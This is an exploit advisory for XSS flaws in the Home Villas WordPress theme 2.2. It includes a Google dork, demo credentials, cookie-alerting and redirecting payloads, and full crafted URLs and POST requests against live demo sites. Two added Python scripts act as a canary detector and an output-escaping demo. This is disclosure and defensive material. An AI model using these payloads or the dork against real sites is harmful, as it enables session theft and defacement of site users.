[+] Exploit Title: Home Villas | Real Estate WordPress Theme v2.2 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/homevillas-real-estate/
[+] Date: 2020-07-24
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chimp Studio [ https://chimpgroup.com ]
[+] Software Version: 2.2
[+] Software Link: https://themeforest.net/item/home-villa-real-estate-wordpress-theme/19446059
[+] Tested on: Debian 10
[+] CVE:
[+] CWE: CWE-79
### [ Info: ]
[i] An unauthenticated reflected XSS and an authenticated persistent (stored) XSS were discovered in the Home Villas theme through 2.2 for WordPress.
[i] Demo account @ houseplanng.com: pocuser / 1rNeg6x7fEDp (login / password)
[i] PoC property URL: https://houseplanng.com/properties/1-4/
[i] PoC Member Profile URL: https://houseplanng.com/members/poc-user/
### [ Vulnerabilities: ]
[x] Unauthenticated Reflected XSS -> Vulnerable parameters: property_type, location, search_type, property_category, min-beds, min-bath, min-garage
[x] Unauthenticated Reflected XSS in /compare-properties/?type=5684&properties_ids=13[payload],88
[x] Authenticated Persistent XSS on Property page -> «House Plan Summary» text area
[x] Authenticated Persistent XSS on Member Profile page -> «Biography» text area
### [ Payloads: ]
[$] "><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru/`;//">
[$] "><img src=x onerror=(alert)(`VLAD\x20VECTOR`);(alert)(document.cookie);window.location='https://vladvector.ru/';>
[$] <Input/Autofocus/%0D*/Onfocus=(alert)(`VLΛD\x20VΞCTOR`);window.location=`https://vladvector.ru/`;>
### [ PoC Unauthenticated Reflected XSS with all vulnerable parameters: ]
[!] https://homevillas.chimpgroup.com/property-medium/?property_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_type`);//%22%3E&location=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`location`);//%22%3E&search_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`search_type`);//%22%3E&property_category=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_category`);//%22%3E&min-beds=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-beds`);//%22%3E&min-bath=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-bath`);//%22%3E&min-garage=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-garage`);//%22%3E&advanced_search=true
[!] GET /property-medium/?property_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_type`);//%22%3E&location=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`location`);//%22%3E&search_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`search_type`);//%22%3E&property_category=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_category`);//%22%3E&min-beds=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-beds`);//%22%3E&min-bath=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-bath`);//%22%3E&min-garage=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-garage`);//%22%3E&advanced_search=true HTTP/1.1
Host: homevillas.chimpgroup.com
### [ PoC Unauthenticated Reflected XSS in /compare-properties/: ]
[!] https://homevillas.chimpgroup.com/compare-properties/?type=5684&properties_ids=13%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://vladvector.ru/`;//%22%3Ex,88x
[!] GET /compare-properties/?type=5684&properties_ids=13%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://vladvector.ru/`;//%22%3Ex,88x HTTP/1.1
Host: homevillas.chimpgroup.com
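Added example (not part of the original advisory and not the theme's code): a Python helper that builds one harmless canary URL per reflected parameter listed above, for both /property-medium/ and /compare-properties/, and classifies a response as echoing the canary unescaped, escaped, or not at all. The canary closes a double-quoted attribute the same way the `">` prefix of the author's payloads does but injects only an unknown tag, so it is safe to use during triage. The endpoints, parameter names, base host and the `13<payload>,88` shape of `properties_ids` are taken from the advisory; the HTML fragments are constructed sample input, not captured from the demo site, and the function names are this example's own.

```python
import html
import urllib.parse
import urllib.request

# Vendor demo host from the advisory; any Home Villas 2.2 install has the same endpoints.
BASE = "https://homevillas.chimpgroup.com"

# Parameters the advisory lists as reflected unescaped by /property-medium/.
SEARCH_PARAMS = ["property_type", "location", "search_type", "property_category",
                 "min-beds", "min-bath", "min-garage"]


def canary_for(name):
    """Harmless per-parameter marker: closes a double-quoted attribute like the
    advisory's '">' prefix does, but injects an unknown tag instead of a script."""
    return f'"><zz-{name}>'


def build_canary_urls(base=BASE):
    """One URL per reflected sink named in the advisory, keyed by parameter name."""
    urls = {}
    for p in SEARCH_PARAMS:
        query = {p: canary_for(p), "advanced_search": "true"}
        urls[p] = f"{base}/property-medium/?" + urllib.parse.urlencode(query)
    # /compare-properties/ reflects properties_ids; keep the author's 13<payload>,88 shape
    query = {"type": "5684", "properties_ids": "13" + canary_for("properties_ids") + ",88"}
    urls["properties_ids"] = f"{base}/compare-properties/?" + urllib.parse.urlencode(query)
    return urls


def classify(body, name):
    """'unescaped' if the raw canary (quote and angle brackets intact) is echoed,
    'escaped' if only the entity-encoded form esc_attr() would emit is, else 'absent'."""
    raw = canary_for(name)
    if raw in body:
        return "unescaped"
    if html.escape(raw, quote=True) in body:
        return "escaped"
    return "absent"


def check_live(base=BASE, timeout=10):
    """Fetch each canary URL and classify the reflection. Needs network access;
    only run it against hosts you are authorised to test."""
    results = {}
    for name, url in build_canary_urls(base).items():
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            results[name] = classify(resp.read().decode("utf-8", "replace"), name)
    return results


# Constructed fragments of a search form re-emitting the submitted value (sample
# input for this example, not captured from the demo site).
SAMPLE_VULN = '<input type="text" name="location" value=""><zz-location>">'
SAMPLE_FIXED = '<input type="text" name="location" value="&quot;&gt;&lt;zz-location&gt;">'

if __name__ == "__main__":
    for name, url in build_canary_urls().items():
        print(name, url)
    print("vulnerable fragment:", classify(SAMPLE_VULN, "location"))
    print("hardened fragment:  ", classify(SAMPLE_FIXED, "location"))
```

`classify` only recognises the `&quot;`/`&lt;`/`&gt;` form that WordPress's `esc_attr()` produces; a site whose escaping uses numeric entities would show up as "absent" rather than "escaped", which is still a signal that the raw canary did not survive.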
### [ PoC Authenticated Persistent XSS -> Property page: ]
[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: houseplanng.com
Referer: https://houseplanng.com/ad-new-property/?
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------331731252912908677314128703645
Content-Length: 5012
Origin: https://houseplanng.com
Cookie: [cookies_here]
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_gallery_images[0]"; filename="1.jpg"
Content-Type: image/png
OK
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_type"
house-plans
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_new_package_used"
on
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_package"
5703
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_phone_number_property"
PoC
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_category[parent]"
PoC
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[bedroom]"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[bathroom]"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[area]"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[storey]"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[depth]"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[width]"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_title"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_desc"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_summary"
"><img src=x onerror=(alert)(`VLAD\x20VECTOR`);(alert)(document.cookie);window.location='https://vladvector.ru/';>
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="property_tags[]"
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_price_options"
price
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_phone_number_property_frontend"
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_price"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_price_type"
Offers in region of
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_video"
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_virtual_tour"
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_title"
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_desc"
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_title"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_desc"
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_counter"
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_first_name"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_last_name"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_email"
linabo5933@invql.com
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_phone_number"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_address"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_gateway"
WP_REM_WOOCOMMERCE_GATEWAY
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_buy_order_flag"
1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_id"
0
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="term_policy"
on
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="action"
user_and_property_meta_save
-----------------------------331731252912908677314128703645--
### [ PoC Authenticated Persistent XSS -> Member Profile page: ]
[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: houseplanng.com
Referer: https://houseplanng.com/dashboard/?dashboard=account
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 455
Origin: https://houseplanng.com
Cookie: [cookies_here]
member_display_name=PoC+User&member_company_slug=poc-user&wp_rem_biography=%3CInput%2FAutofocus%2F%250D*%2FOnfocus%3D(alert)(%60VL%CE%9BD%5Cx20V%CE%9ECTOR%60)%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%2F%60%3B%3E&member_email=linabo5933%40invql.com&wp_rem_user_phone_number=1337&wp_rem_user_website=&wp_rem_user_facebook=&wp_rem_user_google_plus=&wp_rem_user_twitter=&wp_rem_user_linkedIn=&member_profile_image=&action=wp_rem_member_accounts_save
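Added example, not part of the advisory and not the theme's code, covering both stored sinks (the property-page PoC above and the member-profile PoC just shown): a Python script that decodes the member-profile form body once, as PHP does for `$_POST`, recovers the stored biography payload, and pushes it together with the property-summary payload through a vulnerable template (raw echo) and a hardened one (escaped on output). `html.escape()` stands in for WordPress's `esc_html()`/`esc_attr()`; the rendering context of the theme's templates is assumed to be element content, the `<div class="bio">` wrapper and the function names are this example's own, and the request body is the advisory's with the empty social-link fields trimmed.

```python
import html
import re
import urllib.parse

# Request body from the member-profile PoC above (empty social fields trimmed).
PROFILE_BODY = (
    "member_display_name=PoC+User&member_company_slug=poc-user"
    "&wp_rem_biography=%3CInput%2FAutofocus%2F%250D*%2FOnfocus%3D(alert)"
    "(%60VL%CE%9BD%5Cx20V%CE%9ECTOR%60)%3Bwindow.location%3D%60https%3A%2F%2F"
    "vladvector.ru%2F%60%3B%3E&member_email=linabo5933%40invql.com"
    "&wp_rem_user_phone_number=1337&wp_rem_user_website=&member_profile_image="
    "&action=wp_rem_member_accounts_save"
)

# Payload the property-page PoC stores in wp_rem_property_summary (copied from above;
# raw string so the JavaScript \x20 escape is kept literally).
SUMMARY_PAYLOAD = r'''"><img src=x onerror=(alert)(`VLAD\x20VECTOR`);(alert)(document.cookie);window.location='https://vladvector.ru/';>'''


def parse_profile_body(body):
    """Decode the x-www-form-urlencoded body once, the way PHP populates $_POST.
    Note that %250D survives as a literal %0D, exactly as in the author's payload."""
    parsed = urllib.parse.parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items()}


def render_field(value, escape):
    """Emit a stored field into element content. escape=False mirrors the vulnerable
    sink (raw echo); escape=True is the fix, html.escape() standing in for esc_html()."""
    if escape:
        value = html.escape(value, quote=True)
    return f'<div class="bio">{value}</div>'


TAG_RE = re.compile(r"<\s*/?\s*([A-Za-z][\w-]*)")


def has_tag_injection(rendered):
    """True if the rendered fragment contains any tag the template did not emit itself."""
    return any(t.lower() != "div" for t in TAG_RE.findall(rendered))


if __name__ == "__main__":
    fields = parse_profile_body(PROFILE_BODY)
    print("stored biography:", fields["wp_rem_biography"])
    for label, value in (("biography", fields["wp_rem_biography"]),
                         ("summary", SUMMARY_PAYLOAD)):
        for escape in (False, True):
            out = render_field(value, escape)
            print(f"{label} {'escaped' if escape else 'raw':7} -> injected: {has_tag_injection(out)}")
```

Escaping on output neutralises both payloads regardless of how they were stored; if the theme wants to allow limited markup in a biography, the allow-list route is WordPress's `wp_kses_post()` on save or display rather than echoing the field unchanged.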
### [ Contacts: ]
[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector